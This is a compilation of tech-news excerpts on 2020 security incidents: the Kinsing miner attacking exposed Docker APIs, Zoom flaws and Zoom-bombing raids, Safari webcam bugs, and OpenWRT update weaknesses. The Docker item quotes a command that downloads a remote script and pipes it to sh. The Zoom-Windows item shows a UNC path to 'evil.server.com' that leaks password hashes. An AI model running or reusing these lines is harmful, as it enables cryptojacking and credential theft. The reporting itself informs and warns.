Some Docker installations are getting hammered by malware skiddies hoping to mine digital cash using other people’s CPU time.

Infosec outfit Aqua – no, not the Barbie Girl band – said miscreants have spotted that a decent number of Docker deployments are lazily or inadvertently exposing the daemon API port to the public internet with no protection. It’s a fairly common error that hackers have exploited in the past to mine digital coins, although lately we’re told there have been thousands of infection attempts daily via this interface, all involving a piece of Linux malware dubbed Kinsing.

“These are the highest numbers we’ve seen in some time, far exceeding what we have witnessed to date,” noted researcher Gal Singer this week.

“We therefore believe that these attacks are directed by actors with sufficient resources and the infrastructure needed to carry out and sustain such attacks, and that this is not an improvised endeavor.”

If an open system is found, the attacker tells it to create and run a custom Ubuntu container that executes the following command:

/bin/bash -c apt-get update && apt-get install -y wget cron;service cron start; wget -q -O - 142.44.191.122/d.sh | sh;tail -f /dev/null

The fetched d.sh script disables SELINUX security protections, as well as searches out and removes any other malware or cryptomining containers already running on the infected machine. That way it won’t have to compete for CPU time. It uses crontab to ensure it stays running every minute, and a bunch of other stuff: it’s 600 lines long.

The script also downloads the Kinsing malware proper, and runs it. This software nasty tries to make contact with one of four command and control servers in Eastern Europe for any special orders to carry out on the infected system. It also runs a script, called spre.sh, that uses any SSH keys it finds to log into and spread to other machines to run its code.

“The spre.sh shell script that the malware downloads is used to laterally spread the malware across the container network,” Aqua’s Singer said.

“In order to discover potential targets and locate the information it needs to authenticate against, the script passively collects data from /.ssh/config, .bash_history, /.ssh/known_hosts, and the likes. We did not identify any active scanning techniques used to identify additional targets.”

Once that is done, the mining component of the malware is finally executed.

A diagram of the attack process
click to enlarge

The Register has pinged Docker for comment on the attacks. In the meantime, Singer and Aqua recommend blocking the IP addresses linked to this outbreak. It’s also highly recommended you don’t leave the daemon API port facing the internet, and use policies and configurations to limit what systems are allowed to talk to the interface.

“Identify all cloud resources and group them by some logical structure,” said the team. “Review authorization and authentication policies, basic security policies, and adjust them according to the principle of least privilege. Investigate logs, mostly around user actions, look for actions you can’t account for anomalies.” ®

Source: If you don’t cover your Docker daemon API port you’ll have a hell of a time… because cryptocreeps are hunting for it • The Register

After many schools adopted Zoom to conduct online lessons during the coronavirus lockdown, concerns about security and privacy have led to a ban on the video conferencing software across the US.

The chancellor of New York City’s Department of Education Richard A Carranza sent an email to school principals telling them to “cease using Zoom as soon as possible”. And he is not alone; schools in other parts of the country have taken similar action, and educators are now being trained to use Microsoft Teams as this has been suggested as a suitable alternative, partly because it is compliant with FERPA (Family Educational Rights and Privacy Act).

See also:

• Zoom enables meeting passwords and virtual waiting rooms by default as it attempts to beef up security
• Zoom admits to routing some US calls through China
• How to lock down Zoom to improve your privacy and security

Large numbers of teachers spent time learning how to use Zoom to continue educating pupils who are confined to their homes. But growing criticism of Zoom for its approach to privacy and security has given cause for a rethink. Documents seen by Chalkbeat show that principals in NYC have been told: “Based on the DOE’s review of those documented concerns, the DOE will no longer permit the use of Zoom at this time”.

The Washington Post quotes Danielle Filson, spokesperson for the NYC Education Department, as saying:

Providing a safe and secure remote learning experience for our students is essential, and upon further review of security concerns, schools should move away from using Zoom as soon as possible. There are many new components to remote learning, and we are making real-time decisions in the best interest of our staff and student. We will support staff and students in transitioning to different platforms such as Microsoft Teams that have the same capabilities with appropriate security measures in place.

The Post also reports that Clark County Public Schools in Nevada were also moving away from Zoom, saying in a statement that the decision had been taken to ” disable access to Zoom out of an abundance of caution due to instances of hacking that created unsafe environments for teachers and students”.

Schools in Utah, Washington state and beyond are also looking into Zoom alternatives.

Source: American schools are banning Zoom and switching to Microsoft Teams

Meetings on Zoom, the increasingly popular video conferencing service, are encrypted using an algorithm with serious, well-known weaknesses, and sometimes using keys issued by servers in China, even when meeting participants are all in North America, according to researchers at the University of Toronto.

The researchers also found that Zoom protects video and audio content using a home-grown encryption scheme, that there is a vulnerability in Zoom’s “waiting room” feature, and that Zoom appears to have at least 700 employees in China spread across three subsidiaries. They conclude, in a report for the university’s Citizen Lab — widely followed in information security circles — that Zoom’s service is “not suited for secrets” and that it may be legally obligated to disclose encryption keys to Chinese authorities and “responsive to pressure” from them.

Source: Zoom’s Flawed Encryption Linked to China

For those unaware, Zoom officially has a porn problem. The multibillion-dollar video messaging mainstay among employees at Johnson & Johnson and the Department of Homeland Security—not to mention a household name among currently house-bound citizens across the country—has been rocked by story after story of pranksters popping into video meetings with clips of graphic porn or Nazi memorabilia. None of Zoom’s clients, seemingly, are safe: These Zoom bombs have hit city council members and churches alike. They’ve hit Chipotle.

The idea of having our work-from-home happy hours disrupted by someone splicing in something porn-y or Hitler-y is disturbing, and that’s where it usually ends: annoyance, disgust, shock—which is ultimately the response that these posters are trying to incite. But a Gizmodo investigation into multiple Discord chatrooms dedicated to coordinating these attacks revealed that the practice has a far darker side that can leave victims scarred for life—or far worse.

Zoom-based “bombs” and “raids” are typically the forte of high and middle school students whose classes are now almost exclusively taking place on the platform. From last month onward, Zoom’s rolled out a series of changes specifically catering to the educators it has onboard, from lifting the 40-minute limit on free meetings internationally to partnering with Logitech to offer free cameras and headsets to teachers who might need them. This gesture of goodwill promptly blew up in the company’s face when these students quickly realized that the codes and passwords needed to access a given Zoom meeting could be freely shared, leading a select few to coordinate with other students nationwide to spearhead a wave of raids in classrooms across the country.

Teens, in general, have a thing for Discord, a popular chat platform, and Discord is where these raids are coordinated. The platform’s long track record of raids on every platform led it to wedge a statement into its community guidelines explicitly disavowing raids as a “form of harassment.” Now that those raids have hit Zoom, Discord’s been actively booting off some users that are particularly active in a given raid channel, while unceremoniously shutting those channels down left and right.

This crackdown, along with the shuttering of raid-based communities on Reddit like the creatively named r/zoomraids, means that a lot of these channels are hard to find, and that finding them isn’t a guarantee that it’ll exist the next day. Over the course of this story, Gizmodo joined about 15 raid channels—some racking up more than 800 members a pop. By the time you’re reading this, there are at most six left standing—and for the most part, they are hidden behind server names that don’t mention Zoom at all. Discord told Gizmodo in an email that it had removed more than 350 servers for Zoom bombing just this morning.

“This behavior violates Discord’s terms of service, and we strongly condemn it,” a spokesperson told Gizmodo in a statement. “Once we identify those servers engaging in this sort of activity, we quickly investigate and take action, including removing content, banning users and shutting down those servers.”

The bulk of these servers, overall, are made up of teens not only swapping Zoom links back and forth but overall just… being typical edgelord teens—joking about the Holocaust (ironically), using racial slurs (ironically), and sharing a ton of porn (ironically?). Less ironic, but just as dark, are the materials shared back and forth to make these campaigns a reality. Multiple channels that Gizmodo joined had created a roster of Google documents listing the Zoom codes of hundreds of support groups in the U.S., along with the days and times each one would meet. Similar documents were created to target meetings for other at-risk groups, like LGBTQ and trans teens.

Depending on who you ask, raids on recovery groups are either lame, funny, fucked, or some combination of the three. Each of the Discord channels had a list of rules seemingly tailored to throw admins off the scent of the channel’s true purpose. One server’s rulebook stated that its one goal was to “support our fellow students and adults through their hard day of work by surprising them in their online meetings.” Another server for raid planning included the rule, “DO NOT RAID I DO NOT CONDONE IT.”

In many of the channels, all Zoom calls are fair game, whether it’s a Narcotics Anonymous meeting or a kindergarten classroom. Rules aside, the only limit to what’s being shared is in the hands of the poster: Some think playing footage of the 2019 Christchurch Mosque shooting in the middle of an NA meeting is a bridge too far, while others don’t. Some think exposing 9- and 10-year-olds to hardcore porn is too shitty, while others think the line should be drawn at middle schoolers and above.

As one user put it, “this discord freakin showed porn to kindergardners but wont raid an narcotics [anonymous]? y’all soft.”

While Zoom’s yet to respond to our request for comment, the company is undoubtedly aware of its raiding problem. Late last month, it put out an official blog post about “keeping uninvited guests” out of Zoom meetings, which reminds users, “When you share your meeting link on social media or other public forums, that makes your event … extremely public. ANYONE with the link can join your meeting.”

Some of the channels Gizmodo joined did, indeed, set up scrapers and dedicated bots specifically to monitor a Zoom link shared on a given platform. But just as many used a much easier tool: Google search. As confirmed by Gizmodo, public-facing Zoom links share a specific string of characters that, when plugged into Google search (or “dorked,” in internet parlance), will turn up dozens of upcoming Zoom meetings. Trying the search term ourselves, we were able to pull links for Zooms dedicated to hot yoga, wine tasting, and legal advice—all in less than a minute—not to mention more than a few Zoom’s dedicated to parents and their kids.

Putting young children at risk of exposure to horrifying imagery comes up more frequently than you’d might think since Zoom’s teacher-friendly packages apply for preschool teachers as much as it does for college professors. And just like Zoom bombings aimed at high school classes, the reactions of these young children can be passed around in videos recorded by the bombers. In the barely 24 hours we spent joining more than a dozen channels, one video—which showed the confused reactions of second graders being exposed to graphic hardcore pornography in the middle of their class—was frequently shared.

For what should be obvious reasons, we didn’t join any of the many, many raids linked at any given time, so we can’t specify what other young children might be seeing. If we’re assuming the worst, then that means some kids on these video calls are being exposed to footage of decapitation or shootings from sites like Bestgore and LiveLeak, along with any porn scenario you can imagine. Assuming the best-case scenario, the porn’s still there, but the murders aren’t. In either case, kids are at risk: Psychologists have been telling us for years that exposing children to hardcore pornography bumps up the chance that they’ll both become either the victim of sexual assault or end up assaulting someone themselves. Children who see the types of horrific violence you’d find on any gore site can haunt them for the rest of their lives, leading to PTSD or drug abuse.

And when it comes to meetings involving drug abuse, the harm done by these kinds of bombings cannot be overstated. As one Business Insider employee—and Alcoholics Anonymous member—recently explained, the isolation that comes with coronavirus-mandated quarantines is incredibly dangerous for those struggling with addiction:

We are all in our separate homes. And that can be dangerous, because alcoholics are notorious for isolating, for withdrawing from social situations — sometimes with a bottle.

If you drink normally, you may be wondering, ‘Why not just drink — even if you have a problem? Right now, while locked down, who could that hurt?’ I can answer that. I drank myself into the emergency room years ago. I know many people who did. Do you think hospitals need that right now? Do you think healthcare workers need to deal with millions of people whose immune systems are severely compromised by binge drinking?

The risk of relapse doesn’t just come for alcoholics, but anyone with any addiction. As one recent Rolling Stone report detailed, these sorts of weekly meetings can turn into not only a place to discuss their road to recovery but also a place that feels safe to talk about their inarguably valid fears surrounding the current pandemic. When that support line is intercepted—by an edgy teen or otherwise—a recovering addict can lose that tenuous feeling of safety and withdraw from meetings with the support group keeping them clean.

Without that network, some folks fare well and others don’t, with relapse being a bigger risk to those earlier on in recovery, as the Business Insider report explains. For some addictions—like opioids, a relapse can turn deadly shockingly fast. As pointed out by the Centers for Disease Control in 2018, some 70 percent of the tens of thousands of annual drug overdoses in the U.S. happen because of opiate addiction.

Of course, people being dangerously shitty to each other is nothing new. Nor are online pranks. What makes Zoom bombing so wretched is that it’s happening at a time when millions of us are stuck inside with nowhere to go except, perhaps, into a video call with our friends and family, teachers, and support communities—our last tethers to the lives we used to have.

Source: Zoom Bombings Started Off as Pranks. Now Someone Could End Up Dead

Apple patched the vulnerabilities in January and March updates. But before the fixes, all a victim would have needed to do is click one malicious link and an attacker would have been able to spy on them remotely.

“Safari encourages users to save their preferences for site permissions, like whether to trust Skype with microphone and camera access,” says Ryan Pickren, the security researcher who disclosed the vulnerabilities to Apple. “So what an attacker could do with this kill chain is make a malicious website that from Safari’s perspective could then turn into ‘Skype’. And then the malicious site will have all the permissions that you previously granted to Skype, which means an attacker could just start taking pictures of you or turn on your microphone or even screen-share.”

The bugs Pickren found all stem from seemingly minor oversights. For example, he discovered that Safari’s list of the permissions a user has granted to websites treated all sorts of URL variations as being part of the same site, like https://www.example.com, http://example.com, and fake://example.com. By “wiggling around,” as Pickren puts it, he was able to generate specially crafted URLs that could work with scripts embedded in a malicious site to launch the bait-and-switch that would trick Safari.

“I just kind of hammered the browser with really weird cases until Safari got confused and gave an origin that didn’t make sense,” he says. “And eventually the bugs could all kind of bounce from one to the next. Part of this is that some of the bugs were really, really old flaws in the WebKit core from years ago. They probably were not as dangerous as they are now just because the stars lined up on how an attacker would use them today.”

A hacker who tricked a victim into clicking their malicious link would be able to quietly launch the target’s webcam and microphone to capture video, take photos, or record audio. And the attack would work on iPhones, iPads, and Macs alike. None of the flaws are in Apple’s microphone and webcam protections themselves, or even in Safari’s defenses that keep malicious sites from accessing the sensors. Instead, the attack surmounts all of these barriers just by generating a convincing disguise.

Pickren submitted seven vulnerabilities to Apple’s bug bounty program in mid-December and says he got a response that the company had validated the bugs the next day. While an attacker would only exploit three of the bugs to take over webcams in the chain Pickren envisioned, he found other, related flaws along the way that he submitted as well. Pickren says that part of the reason he encountered so many extra bugs was that he was looking for an attack chain that would work on both iOS and macOS—and Safari is designed slightly differently for each.

Source: A Hacker Found a Way to Take Over Any Apple Webcam | WIRED

Zoom’s troubled year just got worse.

Now that a large portion of the world is working from home to ride out the coronavirus pandemic, Zoom’s popularity has rocketed, but also has led to an increased focus on the company’s security practices and privacy promises. Hot on the heels of two security researchers finding a Zoom bug that can be abused to steal Windows passwords, another security researcher found two new bugs that can be used to take over a Zoom user’s Mac, including tapping into the webcam and microphone.

Patrick Wardle, a former NSA hacker and now principal security researcher at Jamf, dropped the two previously undisclosed flaws on his blog Wednesday, which he shared with TechCrunch.

The two bugs, Wardle said, can be launched by a local attacker — that’s where someone has physical control of a vulnerable computer. Once exploited, the attacker can gain and maintain persistent access to the innards of a victim’s computer, allowing them to install malware or spyware.

Wardle’s first bug piggybacks off a previous finding. Zoom uses a “shady” technique — one that’s also used by Mac malware — to install the Mac app without user interaction. Wardle found that a local attacker with low-level user privileges can inject the Zoom installer with malicious code to obtain the highest level of user privileges, known as “root.”

Those root-level user privileges mean the attacker can access the underlying macOS operating system, which are typically off-limits to most users, making it easier to run malware or spyware without the user noticing.

The second bug exploits a flaw in how Zoom handles the webcam and microphone on Macs. Zoom, like any app that needs the webcam and microphone, first requires consent from the user. But Wardle said an attacker can inject malicious code into Zoom to trick it into giving the attacker the same access to the webcam and microphone that Zoom already has. Once Wardle tricked Zoom into loading his malicious code, the code will “automatically inherit” any or all of Zoom’s access rights, he said — and that includes Zoom’s access to the webcam and microphone.

“No additional prompts will be displayed, and the injected code was able to arbitrarily record audio and video,” wrote Wardle.

Because Wardle dropped detail of the vulnerabilities on his blog, Zoom has not yet provided a fix. Zoom also did not respond to TechCrunch’s request for comment.

In the meanwhile, Wardle said, “if you care about your security and privacy, perhaps stop using Zoom.”

Source: Ex-NSA hacker drops new zero-day doom for Zoom | TechCrunch

Today, news of a Zoom issue affecting Microsoft Windows users. The Zoom Windows client is at risk from a flaw in the chat feature that could allow attackers to steal the logins of people who click on a link, according to tech site Bleeping Computer.

When using Zoom, it’s possible for people to communicate with each other via text message in a chat interface. When a chat message is sent containing a URL, this is converted into a hyperlink that others can click on to open a webpage in their browser.

But the Zoom client apparently also turns Windows networking Universal Naming Convention (UNC) paths into a clickable link in the chat messages, security researcher @_g0dmode has found.

MORE FROM FORBESBeware Zoom Users: Here’s How People Can ‘Zoom-Bomb’ Your ChatBy Kate O’Flaherty

Ok, so what’s the problem?

Bleeping Computer demonstrated how regular URL and the UNC path of \\evil.server.com\images\cat.jpg were both converted into a clickable link in the chat message.

The problem with this is, according to Bleeping Computer: “When a user clicks on a UNC path link, Windows will attempt to connect to a remote site using the SMB file sharing protocol to open the remote cat.jpg file.”

And at the same time, by default, Windows sends a user’s login name and NTLM password hash. This can be cracked fairly easily by an attacker to reveal your password.

Security researcher Matthew Hickey posted an example of exploiting the Zoom Windows client using UNC path injection on Twitter.

Source: Zoom User Warning: This Is How Attackers Could Steal Windows Passwords

Every day, a new Zoom security or privacy issue emerges. At least, that’s the way it seems during the COVID-19 crisis as an increasing number of people use the Zoom video conferencing app while working from home.

Soon after a security problem was disclosed that could allow attackers to steal Windows passwords, another researcher has identified two issues that can be used to take over a Zoom user’s Mac–and the microphone and webcam, according to TechCrunch.

The two bugs found by security researcher Patrick Wardle can be used by a local attacker able to gain physical control of a vulnerable Mac. By exploiting the bugs, the adversary can gain access to your computer and install malware or spyware, he wrote in a blog published today.

The first bug is based on another finding by @c1truz_, technical lead at a U.S. threat detection firm called VMRay. He said earlier this week on Twitter: “Ever wondered how the @zoom_us macOS installer does its job without you ever clicking install? Turns out they (ab)use preinstallation scripts, manually unpack the app using a bundled 7zip and install it to /Applications if the current user is in the admin group (no root needed).”

Source: Zoom Users Beware: Here’s How A Flaw Allows Attackers To Take Over Your Mac Microphone And Webcam

For almost three years, OpenWRT—the open source operating system that powers home routers and other types of embedded systems—has been vulnerable to remote code-execution attacks because updates were delivered over an unencrypted channel and digital signature verifications are easy to bypass, a researcher said.

OpenWRT has a loyal base of users who use the freely available package as an alternative to the firmware that comes installed on their devices. Besides routers, OpenWRT runs on smartphones, pocket computers and even laptops and desktop PCs. Users generally find OpenWRT to be a more secure choice because it offers advanced functions and its source code is easy to audit.

Security researcher Guido Vranken, however, recently found that updates and installation files were delivered over unencrypted HTTPs connections, which are open to attacks that allow adversaries to completely replace legitimate updates with malicious ones. The researcher also found that it was trivial for attackers with moderate experience to bypass digital-signature checks that verify a downloaded update as the legitimate one offered by OpenWTR maintainers. The combination of those two lapses makes it possible to send a malicious update that vulnerable devices will automatically install.

Exploits not for everyone

These code-execution exploits are limited in their scope because adversaries must either be in a position to conduct a man-in-the-middle attack or tamper with the DNS server that a device uses to find the update on the Internet. That means routers on a network that has no malicious users and using a legitimate DNS server are safe from attack. Vranken also speculates that packet spoofing or ARP cache poisoning may also make attacks possible, but he cautions that he didn’t test either method.

Source: OpenWRT code-execution bug puts millions of devices at risk | Ars Technica